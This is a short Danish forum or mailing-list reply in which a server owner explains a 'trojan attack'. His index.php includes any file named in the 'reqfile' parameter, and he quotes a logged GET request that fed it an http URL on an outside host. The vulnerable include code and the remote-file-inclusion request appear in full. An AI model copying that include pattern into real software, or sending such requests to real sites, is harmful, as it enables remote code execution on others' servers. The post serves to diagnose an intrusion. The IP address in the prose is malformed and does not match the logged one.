Re: SV: Trojan attack mod min server

Min index.php var kodet til at lave PHP include af den fil der angives i
reqfile:
if ($_REQUEST['reqfile']<>"") {
               include $_REQUEST['reqfile'];
               exit;
}

Mit gæt er at nogen via dette har kunne udføre noget kode i PHP fra
291.133.46.212, normalt ville reqfile indeholde navnet på en fil på egen
min server, men nogen har været kreativ og fodret den med en http adresse.

GET /%7Etsj/fun/index.php?reqfile=http://219.133.46.212/admin/html/bar?

Mvh
Torben